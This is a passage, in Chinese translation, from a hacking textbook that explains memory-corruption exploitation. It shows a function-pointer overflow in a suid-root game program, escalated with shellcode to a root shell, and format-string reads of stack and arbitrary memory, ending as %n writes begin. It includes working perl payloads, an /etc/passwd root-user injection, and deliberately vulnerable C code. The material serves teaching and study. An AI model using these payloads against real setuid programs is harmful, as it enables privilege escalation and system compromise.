ffffe000-fffff000 r-xp 00000000 00:00 0          [vdso]
Aborted
reader@hacking:~/booksrc $ tail /etc/passwd
avahi:x:105:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
cupsys:x:106:113::/home/cupsys:/bin/false
haldaemon:x:107:114:Hardware abstraction layer,,,:/home/haldaemon:/bin/false
hplip:x:108:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:109:118:Gnome Display Manager:/var/lib/gdm:/bin/false
matrix:x:500:500:User Acct:/home/matrix:/bin/bash
jose:x:501:501:Jose Ronnick:/home/jose:/bin/bash
reader:x:999:999:Hacker,,,:/home/reader:/bin/bash
?
myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA:/
root:/tmp/etc/passwd
reader@hacking:~/booksrc $ su myroot
Password:
root@hacking:/home/reader/booksrc# whoami
root
root@hacking:/home/reader/booksrc#

溢出函数指针

如果你已经足够多地玩过game_of_chance.c程序，你会意识到，类似于在赌场，大多数游戏在统计上偏向于庄家。这使得赢得积分变得困难，尽管你可能很幸运。也许有一种方法可以稍微平衡一下概率。这个程序使用函数指针来记住最后玩过的游戏。这个指针存储在user结构中，该结构被声明为全局变量。这意味着用户结构的所有内存都在 bss 段中分配。

来自`game_of_chance.c`

// Custom user struct to store information about users
struct user {
  int uid;
  int credits;
  int highscore;
  char name[100];
  int (*current_game) ();
};

...

// Global variables 
struct user player;      // Player struct

用户结构中的名称缓冲区很可能是溢出的地方。这个缓冲区是由下面的input_name()函数设置的：

// This function is used to input the player name, since 
// scanf("%s", &whatever) will stop input at the first space.
void input_name() {
   char *name_ptr, input_char='\n';
   while(input_char == '\n')     // Flush any leftover 
      scanf("%c", &input_char);  // newline chars.

   name_ptr = (char *) &(player.name); // name_ptr = player name's address
   while(input_char != '\n') {  // Loop until newline.
      *name_ptr = input_char;   // Put the input char into name field.
      scanf("%c", &input_char); // Get the next char.
      name_ptr++;               // Increment the name pointer.
   }
   *name_ptr = 0;  // Terminate the string. 
}

这个函数只在换行符处停止输入。没有任何东西限制它只能输入到目标名称缓冲区的长度，这意味着可能发生溢出。为了利用溢出，我们需要让程序在覆盖函数指针后调用它。这发生在play_the_game()函数中，该函数在从菜单中选择任何游戏时被调用。以下代码片段是菜单选择代码的一部分，用于选择和玩游戏。

	if((choice < 1) || (choice > 7))
	   printf("\n[!!] The number %d is an invalid selection.\n\n", choice);
	else if (choice < 4) {  // Otherwise, choice was a game of some sort.
	      if(choice != last_game) { // If the function ptr isn't set,
	         if(choice == 1)        // then point it at the selected game 
	            player.current_game = pick_a_number;
	         else if(choice == 2)
	            player.current_game = dealer_no_match;
	         else
	            player.current_game = find_the_ace;
	         last_game = choice;   // and set last_game.
	      }
	      play_the_game();   // Play the game.
	   }

如果last_game与当前选择不同，current_game的函数指针将被更改为适当的游戏。这意味着为了使程序调用函数指针而不覆盖它，必须先玩一个游戏来设置last_game变量。

reader@hacking:~/booksrc $ ./game_of_chance 
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 70 credits] ->  1

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: 5
The winning number is 17
Sorry, you didn't win.

You now have 60 credits
Would you like to play again? (y/n)  n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits

7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[1]+  Stopped                 ./game_of_chance
reader@hack ing:~/booksrc $

你可以通过按 CTRL-Z 来暂时挂起当前进程。此时，last_game变量已被设置为 1，所以下次选择 1 时，函数指针将直接被调用而不会被更改。回到 shell 后，我们找出一个合适的溢出缓冲区，稍后可以作为名称粘贴进去。通过带有调试符号重新编译源代码并使用 GDB 在main()上设置断点来运行程序，我们可以探索内存。如下面的输出所示，名称缓冲区位于用户结构中的current_game指针 100 字节处。

reader@hacking:~/booksrc $ gcc -g game_of_chance.c
reader@hacking:~/booksrc $ gdb -q ./a.out 
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048813: file game_of_chance.c, line 41.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at game_of_chance.c:41
41         srand(time(0)); // Seed the randomizer with the current time.
(gdb) p player
$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' <repeats 99 times>, 
current_game = 0}
(gdb) x/x &player.name
0x804b66c <player+12>:  0x00000000
(gdb) x/x &player.current_game
0x804b6d0 <player+112>: 0x00000000
(gdb) p 0x804b6d0 - 0x804b66c
$2 = 100
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $

使用这些信息，我们可以生成一个缓冲区来溢出名称变量。这可以在程序恢复时复制并粘贴到交互式“机会游戏”程序中。要返回挂起的进程，只需输入fg，这是前台的缩写。

reader@hacking:~/booksrc $ perl -e 'print "A"x100 . "BBBB" . "\n"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABBBB
reader@hacking:~/booksrc $ fg
./game_of_chance
5

Change user name

Enter your new name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 60 credits] ->  1

[DEBUG] current_game pointer @ 0x42424242
Segmentation fault 
reader@hacking:~/booksrc $

选择菜单选项 5 来更改用户名，并将溢出缓冲区粘贴进去。这将用0x42424242覆盖函数指针。当再次选择菜单选项 1 时，程序在尝试调用函数指针时会崩溃。这证明了执行可以被控制；现在所需的就是一个有效的地址来替换BBBB。

nm命令列出了目标文件中的符号。这可以用来查找程序中各种函数的地址。

reader@hacking:~/booksrc $ nm game_of_chance
0804b508 d _DYNAMIC
0804b5d4 d _GLOBAL_OFFSET_TABLE_
080496c4 R _IO_stdin_used
         w _Jv_RegisterClasses
0804b4f8 d __CTOR_END__
0804b4f4 d __CTOR_LIST__
0804b500 d __DTOR_END__
0804b4fc d __DTOR_LIST__
0804a4f0 r __FRAME_END__
0804b504 d __JCR_END__
0804b504 d __JCR_LIST__
0804b630 A __bss_start
0804b624 D __data_start
08049670 t __do_global_ctors_aux
08048610 t __do_global_dtors_aux
0804b628 D __dso_handle
         w __gmon_start__
08049669 T __i686.get_pc_thunk.bx
0804b4f4 d __init_array_end
0804b4f4 d __init_array_start
080495f0 T __libc_csu_fini
08049600 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
0804b630 A _edata
0804b6d4 A _end
080496a0 T _f ini
080496c0 R _fp_hw
08048484 T _init
080485c0 T _start
080485e4 t call_gmon_start
         U close@@GLIBC_2.0
0804b640 b completed.1
0804b624 W data_start
080490d1 T dealer_no_match
080486fc T dump
080486d1 T ec_malloc
         U exit@@GLIBC_2.0
08048684 T fatal
080492bf T find_the_ace
08048650 t frame_dummy
080489cc T get_player_data
         U getuid@@GLIBC_2.0
08048d97 T input_name
08048d70 T jackpot
08048803 T main
         U malloc@@GLIBC_2.0
         U open@@GLIBC_2.0
0804b62c d p.0
         U perror@@GLIBC_2.0
08048fde T pick_a_number
08048f23 T play_the_game
0804b660 B player
08048df8 T print_cards
         U printf@@GLIBC_2.0
         U rand@@GLIBC_2.0
         U read@@GLIBC_2.0
08048aaf T register_new_player
         U scanf@@GLIBC_2.0
08048c72 T show_highscore
         U srand@@GLIBC_2.0
         U strcpy@@GLIBC_2.0
         U strncat@@GLIBC_2.0
08048e91 T take_wager
         U time@@GLIBC_2.0
08048b72 T update_player_data
         U write@@GLIBC_2.0 
reader@hacking:~/booksrc $

jackpot()函数是这种攻击的一个很好的目标。尽管游戏给出的赔率很差，但如果将current_game函数指针小心地覆盖为jackpot()函数的地址，您甚至不需要玩游戏就能赢得积分。相反，将直接调用jackpot()函数，发放 100 积分，并使玩家处于有利地位。

此程序从标准输入获取输入。菜单选择可以脚本化在一个单独的缓冲区中，然后通过程序的标准输入管道传输。这些选择将像输入一样被做出。以下示例将选择菜单项 1，尝试猜测数字 7，当被要求再次玩游戏时选择n，最后选择菜单项 7 以退出。

reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n7\n"' | ./game_of_chance 
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->  
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 20
Sorry, you didn't win.

You now have 50 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->  
Thanks for playing! Bye. 
reader@hacking:~/booksrc $

同样的技术可以用来脚本化攻击所需的所有内容。以下行将玩一次“选择一个数字”游戏，然后更改用户名为 100 个A，后面跟着jackpot()函数的地址。这将溢出current_game函数指针，所以当再次玩“选择一个数字”游戏时，将直接调用jackpot()函数。

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\
x8d\x04\x08\n" . "1\nn\n" . "7\n"'
1
5
n
5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAp?
1
n
7
reader@hack ing:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\
x8d\x04\x08\n" . "1\nn\n" . "7\n"' | ./game_of_chance 
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->  
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 15
Sorry, you didn't win.

You now have 40 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 40 credits] ->  
Change user name
Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 40 credits] ->

[DEBUG] current_game po inter @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 140 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->  
Thanks for playing! Bye. 
reader@hacking:~/booksrc $

在确认这种方法有效后，它可以扩展以获得任意数量的积分。

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\
x8d\x04\x08\n" . "1\n" . "y\n"x10 . "n\n5\nJon Erickson\n7\n"' | ./
game_of_chance 
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 1
Sorry, you didn't win.

You now have 130 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 130 credits] ->
Change user name
Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 130 credits] ->
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 230 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 330 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 430 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 530 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 630 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 730 credits
Would you like to play aga in? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 830 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 930 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 1030 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 1130 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 1230 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 1230 credits] ->
Change user name
Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit

[Name: Jon Erickson]
[You have 1230 credits] ->
Thanks for playing! Bye.
reader@hacking:~/booksrc $

如您可能已经注意到的，此程序还以 suid root 运行。这意味着 shellcode 可以用来做比赢得免费积分更多的事情。与基于堆的溢出一样，shellcode 可以存储在环境变量中。在构建合适的攻击缓冲区后，该缓冲区被管道传输到game_of_chance的标准输入。注意 cat 命令中在攻击缓冲区后面的破折号参数。这告诉 cat 程序在攻击缓冲区之后发送标准输入，返回输入控制。即使 root shell 不显示其提示符，它仍然可访问，并且仍然提升权限。

reader@hacking:~/booksrc $ export SHELLCODE=$(cat ./shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./game_of_chance
SHELLCODE will be at 0xbffff9e0
reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n5\n" . "A"x100 . "\xe0\
xf9\xff\xbf\n" . "1\n"' > exploit_buffer
reader@hacking:~/booksrc $ cat exploit_buffer - | ./game_of_chance 
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 70 credits] ->
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 2
Sorry, you didn't win.

You now have 60 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits

7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->  
Change user name
Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 60 credits] ->  
[DEBUG] current_game pointer @ 0xbffff9e0

whoami
root
id
uid=0(root) gid=999(reader)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(
plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(re
ader)

格式化字符串

格式化字符串漏洞攻击是另一种可以用来控制特权程序的技术。与缓冲区溢出攻击一样，格式化字符串漏洞攻击也依赖于可能不会对安全性产生明显影响的编程错误。幸运的是，对于程序员来说，一旦知道了这种技术，就相当容易发现格式化字符串漏洞并消除它们。尽管格式化字符串漏洞现在已不太常见，但以下技术也可以用于其他情况。

格式化参数

到现在为止，您应该对基本的格式化字符串相当熟悉了。它们在之前的程序中广泛使用了像printf()这样的函数。使用格式化字符串的函数，如printf()，简单地评估传递给它的格式化字符串，并在遇到格式参数时执行特殊操作。每个格式参数都期望传递一个额外的变量，所以如果格式字符串中有三个格式参数，那么应该有更多的函数参数（除了格式字符串参数）。

回想一下上一章中解释的各种格式参数。

参数	输入类型	输出类型
`%d`	值	十进制
`%u`	值	无符号十进制
`%x`	值	十六进制
`%s`	指针	字符串
`%n`	指针	已写入的字节数

上一章演示了更常见的格式参数的使用，但忽略了较少见的 %n 格式参数。fmt_uncommon.c 代码演示了其使用。

fmt_uncommon.c

#include <stdio.h>
#include <stdlib.h>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in 
count_one, and the number of bytes up to here X%n is being stored in 
count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack example
   printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

   exit(0); 
}

该程序在其 printf() 语句中使用两个 %n 格式参数。以下是程序编译和执行的输出。

reader@hacking:~/booksrc $ gcc fmt_uncommon.c 
reader@hacking:~/booksrc $ ./a.out 
The number of bytes written up to this point X is being stored in count_one, and the
 number of 
bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at bffff7f4\.  B is 7\. 
reader@hacking:~/booksrc $

%n 格式参数独特之处在于它写入数据而不显示任何内容，与读取然后显示数据相反。当格式函数遇到 %n 格式参数时，它将函数已写入的字节数写入对应函数参数中的地址。在 fmt_uncommon 中，这是在两个地方完成的，使用一元地址运算符将此数据写入变量 count_one 和 count_two，分别。然后输出这些值，揭示在第一个 %n 之前找到了 46 个字节，在第二个 %n 之前找到了 113 个。

最后的栈示例很方便地过渡到解释栈在格式字符串中的作用：

	printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

当调用此 printf() 函数（就像调用任何函数一样），参数以相反的顺序推送到栈中。首先是 B 的值，然后是 A 的地址，接着是 A 的值，最后是格式字符串的地址。

栈看起来就像这里的图示。

格式函数逐字符遍历格式字符串。如果字符不是格式参数的开始（由百分号指定），则字符被复制到输出。如果遇到格式参数，则采取相应的操作，使用与该参数对应的栈中的参数。

图 0x300-3。

但如果只有两个参数被推送到栈中，而格式字符串使用了三个格式参数，会怎样呢？尝试从栈示例的 printf() 行中移除最后一个参数，使其与下面的行匹配。

	printf("A is %d and is at %08x.  B is %x.\n", A, &A);

这可以在编辑器中完成，或者使用一点 sed 魔法。

reader@hacking:~/booksrc $ sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c
reader@hacking:~/booksrc $ diff fmt_uncommon.c fmt_uncommon2.c 
14c14
<    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
---
>       printf("A is %d and is at %08x.  B is %x.\n", A, &A);
reader@hacking:~/booksrc $ gcc fmt_uncommon2.c 
reader@hacking:~/booksrc $ ./a.out
The number of bytes written up to this point X is being stored in count_one, and the
 number of 
bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at bffffc24\.  B is b7fd6ff4\. 
reader@hacking:~/booksrc $

结果是 b7fd6ff4。b7fd6ff4 是什么意思？结果证明，由于没有值被推送到栈中，格式函数只是从第三参数应该存在的地方（通过增加当前帧指针）拉取数据。这意味着 0xb7fd6ff4 是格式函数栈帧下面的第一个值。

这是一个应该记住的有趣细节。如果有一种方法可以控制传递给或期望格式函数的参数数量，那将非常有用。幸运的是，有一个相当常见的编程错误允许这样做。

格式字符串漏洞

有时程序员使用 printf(string) 而不是 printf("%s", string) 来打印字符串。从功能上讲，这没问题。格式函数接收字符串的地址，而不是格式字符串的地址，并遍历字符串，打印每个字符。这两种方法的示例在 fmt_vuln.c 中展示。

fmt_vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, 
test_val);

   exit(0);
}

以下输出显示了 fmt_vuln.c 的编译和执行过程。

reader@hacking:~/booksrc $ gcc -o fmt_vuln fmt_vuln.c 
reader@hacking:~/booksrc $ sudo chown root:root ./fmt_vuln
reader@hacking:~/booksrc $ sudo chmod u+s ./fmt_vuln
reader@hacking:~/booksrc $ ./fmt_vuln testing
The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x08049794 = -72 0xffffffb8 
reader@hacking:~/booksrc $

两种方法似乎都可以与字符串 testing 一起工作。但如果字符串包含格式参数会怎样呢？格式函数应该尝试评估格式参数，并通过增加帧指针来访问适当的函数参数。但正如我们之前看到的，如果适当的函数参数不存在，增加帧指针将引用前一个栈帧中的内存。

reader@hacking:~/booksrc $ ./fmt_vuln testing %x
The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingbffff3e0
[*] test_val @ 0x08049794 = -72 0xffffffb8 
reader@hacking:~/booksrc $

当使用 %x 格式参数时，打印了栈中四字节单词的十六进制表示。这个过程可以重复使用来检查栈内存。

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40')
The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
.%08x.
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
.%08x.
%08x.%08x.
The wrong way to print user-controlled input:
bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e
.30252
e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e
.30252e78.2
52e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78
.252e78
38.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x08049794 = -72 0xffffffb8 
reader@hacking:~/booksrc $

这就是低栈内存的样貌。记住，由于小端架构，每个四字节单词是反向的。字节0x25, 0x30, 0x38, 0x78和0x2e似乎重复很多。想知道这些字节是什么吗？

reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"
%08x. 
reader@hacking:~/booksrc $

如您所见，它们是格式字符串本身的内存。因为格式函数始终位于最高的栈帧中，只要格式字符串存储在栈上的任何位置，它就会位于当前帧指针下方（在更高的内存地址）。这个事实可以用来控制格式函数的参数。如果使用通过引用传递的格式参数，如 %s 或 %n，这尤其有用。

从任意内存地址读取

%s 格式参数可以用来从任意内存地址读取。由于可以读取原始格式字符串的数据，原始格式字符串的一部分可以用来向 %s 格式参数提供一个地址，如下所示：

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAAbffff3d0.b7fe75fc.00000000.41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

0x41 的四个字节表明第四个格式参数正在从格式字符串的起始位置读取以获取其数据。如果第四个格式参数是 %s 而不是 %x，格式函数将尝试打印位于 0x41414141 的字符串。这将导致程序在段错误中崩溃，因为这不是一个有效的地址。但如果使用有效的内存地址，这个过程可以用来读取位于该内存地址的字符串。

reader@hacking:~/booksrc $ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
reader@hacking:~/booksrc $ ./getenvaddr PATH ./fmt_vuln
PATH will be at 0xbffffdd7
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
The right way to print user-controlled input:
????%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:
/bin:/
usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

在这里，使用 getenvaddr 程序来获取环境变量 PATH 的地址。由于程序名 fmt_vuln 比程序名 getenvaddr 少两个字节，所以地址上加了四，由于字节序的原因，字节被反转。%s 的第四个格式参数从格式字符串的起始位置读取，认为它是作为函数参数传递的地址。由于这个地址是 PATH 环境变量的地址，所以它被打印出来，就像将环境变量的指针传递给 printf() 一样。

现在已知栈帧末尾和格式字符串内存起始之间的距离，可以省略 %x 格式参数中的字段宽度参数。这些格式参数只需要用来遍历内存。使用这种技术，任何内存地址都可以作为字符串来检查。

向任意内存地址写入

如果可以使用 %s 格式参数读取任意内存地址，那么你应该能够使用相同的技巧与 %n 一起写入任意内存地址。现在事情变得有趣了。

test_val 变量已经在 fmt_vuln.c 程序的调试语句中打印其地址和值，这正是一个容易被覆盖的地方。测试变量位于 0x08049794，因此通过使用类似的技术，你应该能够向该变量写入数据。

